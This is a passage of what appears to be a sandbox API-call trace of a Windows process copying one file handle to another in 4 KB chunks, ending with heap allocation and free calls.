0x0 [0073.398] SetLastError (dwErrCode=0x0) [0073.398] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.398] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.503] GetLastError () returned 0x0 [0073.503] SetLastError (dwErrCode=0x0) [0073.503] GetLastError () returned 0x0 [0073.503] SetLastError (dwErrCode=0x0) [0073.504] GetLastError () returned 0x0 [0073.514] SetLastError (dwErrCode=0x0) [0073.542] GetLastError () returned 0x0 [0073.542] SetLastError (dwErrCode=0x0) [0073.542] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.542] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.542] GetLastError () returned 0x0 [0073.543] SetLastError (dwErrCode=0x0) [0073.543] GetLastError () returned 0x0 [0073.543] SetLastError (dwErrCode=0x0) [0073.543] GetLastError () returned 0x0 [0073.543] SetLastError (dwErrCode=0x0) [0073.543] GetLastError () returned 0x0 [0073.543] SetLastError (dwErrCode=0x0) [0073.543] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.543] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.543] GetLastError () returned 0x0 [0073.543] SetLastError (dwErrCode=0x0) [0073.543] GetLastError () returned 0x0 [0073.544] SetLastError (dwErrCode=0x0) [0073.544] GetLastError () returned 0x0 [0073.544] SetLastError (dwErrCode=0x0) [0073.544] GetLastError () returned 0x0 [0073.544] SetLastError (dwErrCode=0x0) [0073.544] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.544] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.544] GetLastError () returned 0x0 [0073.544] SetLastError (dwErrCode=0x0) [0073.544] GetLastError () returned 0x0 [0073.544] SetLastError (dwErrCode=0x0) [0073.544] GetLastError () returned 0x0 [0073.545] SetLastError (dwErrCode=0x0) [0073.545] GetLastError () returned 0x0 [0073.545] SetLastError (dwErrCode=0x0) [0073.545] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.545] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.545] GetLastError () returned 0x0 [0073.545] SetLastError (dwErrCode=0x0) [0073.545] GetLastError () returned 0x0 [0073.545] SetLastError (dwErrCode=0x0) [0073.545] GetLastError () returned 0x0 [0073.545] SetLastError (dwErrCode=0x0) [0073.545] GetLastError () returned 0x0 [0073.545] SetLastError (dwErrCode=0x0) [0073.546] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.546] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.546] GetLastError () returned 0x0 [0073.546] SetLastError (dwErrCode=0x0) [0073.546] GetLastError () returned 0x0 [0073.546] SetLastError (dwErrCode=0x0) [0073.546] GetLastError () returned 0x0 [0073.546] SetLastError (dwErrCode=0x0) [0073.546] GetLastError () returned 0x0 [0073.546] SetLastError (dwErrCode=0x0) [0073.546] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.546] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.547] GetLastError () returned 0x0 [0073.547] SetLastError (dwErrCode=0x0) [0073.547] GetLastError () returned 0x0 [0073.547] SetLastError (dwErrCode=0x0) [0073.547] GetLastError () returned 0x0 [0073.547] SetLastError (dwErrCode=0x0) [0073.547] GetLastError () returned 0x0 [0073.547] SetLastError (dwErrCode=0x0) [0073.547] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.547] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.547] GetLastError () returned 0x0 [0073.547] SetLastError (dwErrCode=0x0) [0073.547] GetLastError () returned 0x0 [0073.547] SetLastError (dwErrCode=0x0) [0073.547] GetLastError () returned 0x0 [0073.547] SetLastError (dwErrCode=0x0) [0073.547] GetLastError () returned 0x0 [0073.547] SetLastError (dwErrCode=0x0) [0073.547] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.547] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.548] GetLastError () returned 0x0 [0073.548] SetLastError (dwErrCode=0x0) [0073.548] GetLastError () returned 0x0 [0073.548] SetLastError (dwErrCode=0x0) [0073.548] GetLastError () returned 0x0 [0073.548] SetLastError (dwErrCode=0x0) [0073.548] GetLastError () returned 0x0 [0073.548] SetLastError (dwErrCode=0x0) [0073.548] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.548] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.548] GetLastError () returned 0x0 [0073.548] SetLastError (dwErrCode=0x0) [0073.548] GetLastError () returned 0x0 [0073.548] SetLastError (dwErrCode=0x0) [0073.548] GetLastError () returned 0x0 [0073.548] SetLastError (dwErrCode=0x0) [0073.548] GetLastError () returned 0x0 [0073.548] SetLastError (dwErrCode=0x0) [0073.548] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.548] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.549] GetLastError () returned 0x0 [0073.549] SetLastError (dwErrCode=0x0) [0073.549] GetLastError () returned 0x0 [0073.549] SetLastError (dwErrCode=0x0) [0073.549] GetLastError () returned 0x0 [0073.549] SetLastError (dwErrCode=0x0) [0073.549] GetLastError () returned 0x0 [0073.549] SetLastError (dwErrCode=0x0) [0073.549] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.549] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.549] GetLastError () returned 0x0 [0073.549] SetLastError (dwErrCode=0x0) [0073.549] GetLastError () returned 0x0 [0073.549] SetLastError (dwErrCode=0x0) [0073.549] GetLastError () returned 0x0 [0073.549] SetLastError (dwErrCode=0x0) [0073.549] GetLastError () returned 0x0 [0073.549] SetLastError (dwErrCode=0x0) [0073.549] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.550] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.550] GetLastError () returned 0x0 [0073.550] SetLastError (dwErrCode=0x0) [0073.550] GetLastError () returned 0x0 [0073.550] SetLastError (dwErrCode=0x0) [0073.550] GetLastError () returned 0x0 [0073.550] SetLastError (dwErrCode=0x0) [0073.550] GetLastError () returned 0x0 [0073.550] SetLastError (dwErrCode=0x0) [0073.550] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.550] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.550] GetLastError () returned 0x0 [0073.550] SetLastError (dwErrCode=0x0) [0073.550] GetLastError () returned 0x0 [0073.550] SetLastError (dwErrCode=0x0) [0073.550] GetLastError () returned 0x0 [0073.550] SetLastError (dwErrCode=0x0) [0073.550] GetLastError () returned 0x0 [0073.550] SetLastError (dwErrCode=0x0) [0073.550] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.551] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.551] GetLastError () returned 0x0 [0073.551] SetLastError (dwErrCode=0x0) [0073.551] GetLastError () returned 0x0 [0073.551] SetLastError (dwErrCode=0x0) [0073.551] GetLastError () returned 0x0 [0073.551] SetLastError (dwErrCode=0x0) [0073.551] GetLastError () returned 0x0 [0073.551] SetLastError (dwErrCode=0x0) [0073.551] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.551] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.551] GetLastError () returned 0x0 [0073.551] SetLastError (dwErrCode=0x0) [0073.551] GetLastError () returned 0x0 [0073.551] SetLastError (dwErrCode=0x0) [0073.551] GetLastError () returned 0x0 [0073.551] SetLastError (dwErrCode=0x0) [0073.551] GetLastError () returned 0x0 [0073.551] SetLastError (dwErrCode=0x0) [0073.552] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.552] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.552] GetLastError () returned 0x0 [0073.552] SetLastError (dwErrCode=0x0) [0073.552] GetLastError () returned 0x0 [0073.552] SetLastError (dwErrCode=0x0) [0073.552] GetLastError () returned 0x0 [0073.552] SetLastError (dwErrCode=0x0) [0073.552] GetLastError () returned 0x0 [0073.552] SetLastError (dwErrCode=0x0) [0073.552] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.552] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.552] GetLastError () returned 0x0 [0073.552] SetLastError (dwErrCode=0x0) [0073.552] GetLastError () returned 0x0 [0073.552] SetLastError (dwErrCode=0x0) [0073.552] GetLastError () returned 0x0 [0073.552] SetLastError (dwErrCode=0x0) [0073.552] GetLastError () returned 0x0 [0073.553] SetLastError (dwErrCode=0x0) [0073.553] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.553] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.553] GetLastError () returned 0x0 [0073.553] SetLastError (dwErrCode=0x0) [0073.553] GetLastError () returned 0x0 [0073.553] SetLastError (dwErrCode=0x0) [0073.553] GetLastError () returned 0x0 [0073.553] SetLastError (dwErrCode=0x0) [0073.553] GetLastError () returned 0x0 [0073.553] SetLastError (dwErrCode=0x0) [0073.553] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.553] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.553] GetLastError () returned 0x0 [0073.553] SetLastError (dwErrCode=0x0) [0073.553] GetLastError () returned 0x0 [0073.553] SetLastError (dwErrCode=0x0) [0073.553] GetLastError () returned 0x0 [0073.553] SetLastError (dwErrCode=0x0) [0073.554] GetLastError () returned 0x0 [0073.554] SetLastError (dwErrCode=0x0) [0073.554] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.554] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.554] GetLastError () returned 0x0 [0073.554] SetLastError (dwErrCode=0x0) [0073.554] GetLastError () returned 0x0 [0073.554] SetLastError (dwErrCode=0x0) [0073.554] GetLastError () returned 0x0 [0073.554] SetLastError (dwErrCode=0x0) [0073.554] GetLastError () returned 0x0 [0073.554] SetLastError (dwErrCode=0x0) [0073.554] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.554] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.554] GetLastError () returned 0x0 [0073.554] SetLastError (dwErrCode=0x0) [0073.554] GetLastError () returned 0x0 [0073.554] SetLastError (dwErrCode=0x0) [0073.555] GetLastError () returned 0x0 [0073.555] SetLastError (dwErrCode=0x0) [0073.555] GetLastError () returned 0x0 [0073.555] SetLastError (dwErrCode=0x0) [0073.555] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.555] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.555] GetLastError () returned 0x0 [0073.555] SetLastError (dwErrCode=0x0) [0073.555] GetLastError () returned 0x0 [0073.555] SetLastError (dwErrCode=0x0) [0073.555] GetLastError () returned 0x0 [0073.555] SetLastError (dwErrCode=0x0) [0073.555] GetLastError () returned 0x0 [0073.555] SetLastError (dwErrCode=0x0) [0073.555] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.555] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.555] GetLastError () returned 0x0 [0073.555] SetLastError (dwErrCode=0x0) [0073.555] GetLastError () returned 0x0 [0073.556] SetLastError (dwErrCode=0x0) [0073.556] GetLastError () returned 0x0 [0073.556] SetLastError (dwErrCode=0x0) [0073.556] GetLastError () returned 0x0 [0073.556] SetLastError (dwErrCode=0x0) [0073.556] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.556] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.556] GetLastError () returned 0x0 [0073.556] SetLastError (dwErrCode=0x0) [0073.556] GetLastError () returned 0x0 [0073.556] SetLastError (dwErrCode=0x0) [0073.556] GetLastError () returned 0x0 [0073.556] SetLastError (dwErrCode=0x0) [0073.556] GetLastError () returned 0x0 [0073.556] SetLastError (dwErrCode=0x0) [0073.556] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.556] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.556] GetLastError () returned 0x0 [0073.556] SetLastError (dwErrCode=0x0) [0073.557] GetLastError () returned 0x0 [0073.557] SetLastError (dwErrCode=0x0) [0073.557] GetLastError () returned 0x0 [0073.557] SetLastError (dwErrCode=0x0) [0073.557] GetLastError () returned 0x0 [0073.557] SetLastError (dwErrCode=0x0) [0073.557] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.557] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.557] GetLastError () returned 0x0 [0073.557] SetLastError (dwErrCode=0x0) [0073.557] GetLastError () returned 0x0 [0073.557] SetLastError (dwErrCode=0x0) [0073.557] GetLastError () returned 0x0 [0073.557] SetLastError (dwErrCode=0x0) [0073.557] GetLastError () returned 0x0 [0073.557] SetLastError (dwErrCode=0x0) [0073.557] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.558] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.558] GetLastError () returned 0x0 [0073.558] SetLastError (dwErrCode=0x0) [0073.558] GetLastError () returned 0x0 [0073.558] SetLastError (dwErrCode=0x0) [0073.558] GetLastError () returned 0x0 [0073.558] SetLastError (dwErrCode=0x0) [0073.558] GetLastError () returned 0x0 [0073.558] SetLastError (dwErrCode=0x0) [0073.558] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.558] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.558] GetLastError () returned 0x0 [0073.558] SetLastError (dwErrCode=0x0) [0073.559] GetLastError () returned 0x0 [0073.559] SetLastError (dwErrCode=0x0) [0073.559] GetLastError () returned 0x0 [0073.559] SetLastError (dwErrCode=0x0) [0073.559] GetLastError () returned 0x0 [0073.559] SetLastError (dwErrCode=0x0) [0073.559] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.559] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.559] GetLastError () returned 0x0 [0073.559] SetLastError (dwErrCode=0x0) [0073.559] GetLastError () returned 0x0 [0073.559] SetLastError (dwErrCode=0x0) [0073.559] GetLastError () returned 0x0 [0073.559] SetLastError (dwErrCode=0x0) [0073.559] GetLastError () returned 0x0 [0073.559] SetLastError (dwErrCode=0x0) [0073.559] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x444, lpOverlapped=0x0) returned 1 [0073.559] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.560] GetLastError () returned 0x0 [0073.560] SetLastError (dwErrCode=0x0) [0073.560] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0073.560] GetLastError () returned 0x0 [0073.560] SetLastError (dwErrCode=0x0) [0073.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0073.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0073.560] GetLastError () returned 0x0 [0073.560] SetLastError (dwErrCode=0x0) [0073.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0073.560] WriteFile (in: hFile=0x420, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x450, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x450, lpOverlapped=0x0) returned 1 [0073.560] GetLastError () returned 0x0 [0073.560] SetLastError (dwErrCode=0x0) [0073.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0073.560] GetLastError () returned 0x0 [0073.560] SetLastError (dwErrCode=0x0) [0073.560] HeapFree (in: 